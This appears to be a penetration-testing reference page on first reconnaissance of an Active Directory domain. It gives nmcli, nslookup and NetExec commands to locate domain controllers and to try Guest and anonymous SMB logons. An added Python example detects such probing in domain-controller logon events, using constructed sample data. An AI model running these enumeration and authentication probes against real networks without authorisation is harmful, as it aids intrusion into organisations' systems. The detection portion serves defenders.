Active Directory First Lookup

Table of contents

  1. Prerequisites
  2. Exploit

Prerequisites

  • Network route to at least one domain controller.

Exploit

First, let’s identify the domain controllers of the Active Directory domain you are targeting.

# Get domain name.
nmcli dev show $Interface | grep -i "domain"

# Get the domain controllers' IPs.
nslookup $DomainName

Now, using NetExec, try to authenticate anonymously and as Guest.

# Get the domain controllers' system info.
nxc smb $DomainControllersIPs

# Authenticate as Guest and anonymous.
nxc smb $DomainControllerIP -d $DomainName -u 'Guest' -p ''
nxc smb $DomainControllerIP -d $DomainName -u 'Guest' -p '' --local-auth
nxc smb $DomainControllerIP -d $DomainName -u '' -p ''
nxc smb $DomainControllerIP -d $DomainName -u '' -p '' --local-auth
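
Seen from the domain controller, the Guest and anonymous authentication attempts above are network logons from a single source within seconds of each other. The following is an added detection example, not part of the original page: it assumes Security-log events 4624/4625 exported as JSON lines, and the function names, field layout and sample records are constructed for illustration.

```python
# Added example (not from the original page): detect Guest + anonymous probing.
# Assumption: DC Security-log events 4624/4625 exported as JSON lines.
import json
from collections import defaultdict
from datetime import datetime, timedelta

ANON_SID = "S-1-5-7"   # well-known SID of ANONYMOUS LOGON
GUEST_RID = "-501"     # built-in Guest keeps RID 501 even when renamed
DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID

# Constructed sample records, not real log data.
ROWS = [
    (4625, "2024-05-02T09:14:01", "Guest", "S-1-0-0", "10.0.5.23"),
    (4624, "2024-05-02T09:14:03", "ANONYMOUS LOGON", ANON_SID, "10.0.5.23"),
    (4624, "2024-05-02T09:20:00", "alice", DOM + "-1501", "10.0.5.23"),
    (4624, "2024-05-02T11:30:00", "ANONYMOUS LOGON", ANON_SID, "10.0.7.8"),
    (4624, "2024-05-02T12:00:00", "visitor", DOM + "-501", "10.0.9.9"),
    (4624, "2024-05-02T13:00:00", "ANONYMOUS LOGON", ANON_SID, "10.0.9.9"),
]
FIELDS = ("EventID", "TimeCreated", "TargetUserName", "TargetUserSid", "IpAddress")
SAMPLE = "\n".join(json.dumps(dict(zip(FIELDS, r), LogonType=3)) for r in ROWS)

def classify(ev):
    """Return 'guest', 'anonymous' or None for one logon event."""
    name = ev.get("TargetUserName", "").lower()
    sid = ev.get("TargetUserSid", "")
    if sid == ANON_SID or name == "anonymous logon":
        return "anonymous"
    if sid.endswith(GUEST_RID) or name == "guest":
        return "guest"
    return None

def probing_sources(lines, window_minutes=5):
    """Source IPs with both Guest and anonymous network logons inside the window."""
    seen = defaultdict(list)
    for line in lines.splitlines():
        ev = json.loads(line)
        kind = classify(ev)
        # LogonType 3 = network logon (SMB); failed attempts (4625) count too.
        if ev["EventID"] in (4624, 4625) and ev["LogonType"] == 3 and kind:
            seen[ev["IpAddress"]].append((datetime.fromisoformat(ev["TimeCreated"]), kind))
    flagged = []
    for ip, hits in seen.items():
        guest = [t for t, k in hits if k == "guest"]
        anon = [t for t, k in hits if k == "anonymous"]
        if any(abs(g - a) <= timedelta(minutes=window_minutes) for g in guest for a in anon):
            flagged.append(ip)
    return sorted(flagged)
```

Matching Guest by RID 501 rather than by name keeps the check working when the account has been renamed or localized; failed logons (4625) usually carry a null SID, so the name match covers those.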